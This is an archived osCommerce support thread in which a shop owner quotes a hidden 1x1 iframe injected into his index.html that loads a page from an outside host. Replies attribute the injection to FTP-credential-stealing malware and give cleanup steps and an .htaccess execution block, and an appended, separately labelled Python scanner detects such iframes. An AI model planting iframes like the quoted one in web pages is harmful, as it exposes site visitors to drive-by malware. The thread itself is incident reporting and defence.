
This topic is now archived and is closed to further replies.

modelspecialist

code injected in my php files


I've noticed today that I've had a security breach last night; suddenly my admin login wouldn't work anymore. My browser also stated I needed a plugin all of a sudden to be able to show the page correctly, which got my spidey senses tingling..

 

I opened up the index.html file that forwarded visitors to the shop's index site, and found that the following code was injected at the bottom:

 

<iframe src="http://gratwall.vv.cc/showthread.php?t=80480463" width="1" height="1" frameborder="0"></iframe>

 

I'm not sure what it does but I'm quite confident that it's the source of my problem.

I'm reinstalling my shop (it's quite new so I don't have a lot of work on it) but I still wanted to share this in case other people had the same problem.


Make sure that the backup that you are re-installing is also clean of the hack.

After you have done the re-install, your shop will still be hackable, so you need to plug that hole.



I've noticed today that I've had a security breach last night; suddenly...

Just a random passer-by here, not related to osCommerce (googled for "gratwall.vv.cc" and landed here). I had exactly the same thing on my sites today and had to reupload all infected index.* files.

The problem is malware on your PC stealing FTP account data from your FTP client and sending it to the attacker's site. I got my PC infected from a warez website yesterday with this script. Before restoring files you should be sure you have found and deleted that malware, otherwise all files on your website will be infected again within several hours (or days). Also, don't forget to change the FTP password for your hosting afterwards.

Personally, I solved this problem by rewriting my entire disk C: from a backup disk image I keep at hand for such cases, afterwards changed ftp passwords and proceeded to restore original php and html files from backup folders.


Thanks for this info, AntonPtisyn. I did indeed run a spyware check and my antivirus found a trojan horse in a file on my PC. I have no idea how it got there. Anyway, it seems to work through the images folder; I found this in my .htaccess file:

 

<FilesMatch "\.(php([0-9]|s)?|s?p?html|cgi|pl|exe)$">
    Order Deny,Allow
    Deny from all
</FilesMatch>


That is supposed to be the .htaccess for the images directory. It prevents files from being executed from that directory.

 

 

 

Chris
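
Added example, not part of the original thread: a small Python scanner for the kind of hidden iframe quoted in the first post, for checking a restored web root or a backup before re-uploading it. The file-extension list, the `own_hosts` parameter and the sample markup are assumptions made for this example.

```python
import re
from pathlib import Path
from urllib.parse import urlparse

EXTENSIONS = {".php", ".html", ".htm", ".phtml", ".tpl"}  # assumed web file types
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
# Constructed sample: one local frame, one visible embed, one frame appended at the bottom.
SAMPLE = """<html><body>
<iframe src="/local/banner.html" width="1" height="1"></iframe>
<iframe src="https://maps.example.com/embed" width="600" height="400"></iframe>
</body></html>
<iframe src="http://injected.example.invalid/t.php?t=1" width="1" height="1" frameborder="0"></iframe>
"""

def parse_attrs(tag):
    """Return the tag's attributes as a dict with lowercase keys."""
    return {m.group(1).lower(): next(g for g in m.groups()[1:] if g is not None)
            for m in ATTR_RE.finditer(tag)}

def is_hidden(attrs):
    """True if width or height is 2px or less, or inline CSS hides the frame."""
    for dim in ("width", "height"):
        value = attrs.get(dim, "").strip().lower().rstrip("px")
        if value.isdigit() and int(value) <= 2:
            return True
    style = attrs.get("style", "").replace(" ", "").lower()
    return "display:none" in style or "visibility:hidden" in style

def find_hidden_iframes(text, own_hosts=()):
    """Return (line_number, src) for each hidden iframe that loads a foreign host."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        attrs = parse_attrs(m.group(0))
        src = attrs.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        if host and host not in own_hosts and is_hidden(attrs):
            hits.append((text.count("\n", 0, m.start()) + 1, src))
    return hits

def scan_tree(root, own_hosts=()):
    """Scan a web root or an unpacked backup; returns {path: [(line, src), ...]}."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in EXTENSIONS:
            hits = find_hidden_iframes(path.read_text(errors="replace"), own_hosts)
            if hits:
                report[str(path)] = hits
    return report
```

Run `scan_tree()` on the directory holding the backup or the downloaded site copy. An empty result only means this one pattern was not found, not that the files are clean.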

